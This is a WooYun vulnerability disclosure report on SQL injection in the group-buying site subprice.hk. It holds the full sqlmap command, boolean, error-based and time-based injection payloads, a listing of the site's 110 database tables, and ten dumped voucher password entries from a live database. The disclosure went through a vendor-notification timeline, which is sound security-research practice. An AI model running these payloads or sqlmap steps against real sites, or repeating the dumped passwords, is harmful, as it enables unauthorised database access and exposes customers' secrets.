乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-20: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经确认,细节仅向厂商公开 2015-12-04: 细节向核心白帽子及相关领域专家公开 2015-12-14: 细节向普通白帽子公开 2015-12-24: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
Sub Price subprice.hk致力為大家搜羅各樣"驚喜價",每日更新的今日Sub Price,潮流玩物,扮靚護膚,各樣美食等。包羅萬有,梗有樣合您心意。只要在限定時間內,有指定數量(或更多)志同道合的用家跟您一同購入優惠,即可以低至半價甚至一折,獨家感受surprise。
地址:http://**.**.**.**/index.php?m=Goods&a=show&suppliers_id=7&id=578
python sqlmap.py -u "http://**.**.**.**/index.php?m=Goods&a=show&suppliers_id=7&id=578" -p suppliers_id --technique=BET --random-agent --batch -D subprice_db -T fanwe_group_bond -C id,user_id,password --dump --start 1 --stop 10
back-end DBMS: MySQL 5.0Database: subprice_db+------------------+---------+| Table | Entries |+------------------+---------+| fanwe_group_bond | 58627 |+------------------+---------+
---Parameter: suppliers_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: m=Goods&a=show&suppliers_id=7 AND 3662=3662&id=578 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: m=Goods&a=show&suppliers_id=7 AND (SELECT 9602 FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT (ELT(9602=9602,1))),0x71786b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&id=578 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: m=Goods&a=show&suppliers_id=7 AND (SELECT * FROM (SELECT(SLEEP(5)))Oemz)&id=578---back-end DBMS: MySQL 5.0available databases [2]:[*] information_schema[*] subprice_db
Database: subprice_db[110 tables]+----------------------------------+| fanwe_admin || fanwe_admin_city || fanwe_adv || fanwe_adv_position || fanwe_ajax_send || fanwe_article || fanwe_article_cate || fanwe_attachment || fanwe_attachment_link || fanwe_brand || fanwe_cart || fanwe_cart_card || fanwe_collect || fanwe_coupon || fanwe_coupon_region || fanwe_coupon_send_log || fanwe_currency || fanwe_delivery || fanwe_delivery_region || fanwe_ecv || fanwe_ecv_type || fanwe_email_tool || fanwe_express || fanwe_goods || fanwe_goods_attr || fanwe_goods_cate || fanwe_goods_gallery || fanwe_goods_reviews || fanwe_goods_spec || fanwe_goods_spec_gallery || fanwe_goods_spec_item || fanwe_goods_type || fanwe_goods_type_attr || fanwe_group_bond || fanwe_group_city || fanwe_group_message || fanwe_group_message_follow || fanwe_keywords || fanwe_lang_conf || fanwe_layout || fanwe_link || fanwe_log || fanwe_lottery || fanwe_lottery_goods || fanwe_lottery_items || fanwe_lottery_no || fanwe_lottery_settings || fanwe_lottery_user || fanwe_lottery_user_group || fanwe_mail_address_list || fanwe_mail_address_send_list || fanwe_mail_list || fanwe_mail_send_list || fanwe_mail_template || fanwe_message || fanwe_nav || fanwe_order || fanwe_order_consignment || fanwe_order_consignment_goods || fanwe_order_goods || fanwe_order_incharge || fanwe_order_log || fanwe_order_promote || fanwe_order_re_consignment || fanwe_order_re_consignment_goods || fanwe_order_uncharge || fanwe_payment || fanwe_payment_log || fanwe_payment_money_log || fanwe_promote || fanwe_promote_card || fanwe_promote_child || fanwe_promote_user_card || fanwe_promote_user_group || fanwe_referrals || fanwe_region_conf || fanwe_role || fanwe_role_access || fanwe_role_nav || fanwe_role_node || fanwe_send_list || fanwe_sms || fanwe_sms_mobile_verify || fanwe_sms_send || fanwe_sms_send_log || fanwe_sms_subscribe || fanwe_smtp || fanwe_spec || fanwe_spec_type || fanwe_supplier_goods || fanwe_suppliers || fanwe_suppliers_cate || fanwe_suppliers_depart || fanwe_sys_conf || fanwe_user || fanwe_user_consignee || fanwe_user_extend || fanwe_user_field || fanwe_user_group || fanwe_user_group_price || fanwe_user_incharge || fanwe_user_money_log || fanwe_user_score_log || fanwe_user_uncharge || fanwe_vote || fanwe_vote_group || fanwe_vote_input || fanwe_vote_item || fanwe_vote_option || fanwe_weight |+----------------------------------+
Database: subprice_dbTable: fanwe_group_bond[21 columns]+----------------+--------------+| Column | Type |+----------------+--------------+| arr | varchar(255) || buy_time | int(11) || create_time | int(11) || depart_id | int(10) || end_time | int(11) || goods_id | int(11) || goods_name | varchar(255) || id | int(11) || is_lookat | tinyint(1) || is_send_msg | tinyint(1) || is_valid | tinyint(1) || msg_length | int(11) || order_goods_id | int(10) || order_id | varchar(200) || password | varchar(255) || send_count | int(10) || sn | varchar(255) || start_time | datetime || status | tinyint(1) || use_time | int(11) || user_id | int(11) |+----------------+--------------+
选取其中10个进行展示:
Database: subprice_dbTable: fanwe_group_bond[10 entries]+-----+---------+----------+| id | user_id | password |+-----+---------+----------+| 179 | 0 | 32653038 || 180 | 0 | 65666264 || 181 | 63 | 34366135 || 182 | 0 | 36386164 || 183 | 0 | 34386332 || 184 | 0 | 36383166 || 185 | 0 | 64633930 || 186 | 0 | 30306364 || 187 | 0 | 66343039 || 188 | 0 | 61383539 |+-----+---------+----------+
上WAF。
危害等级:中
漏洞Rank:9
确认时间:2015-11-24 12:17
Referred to related parties.
暂无
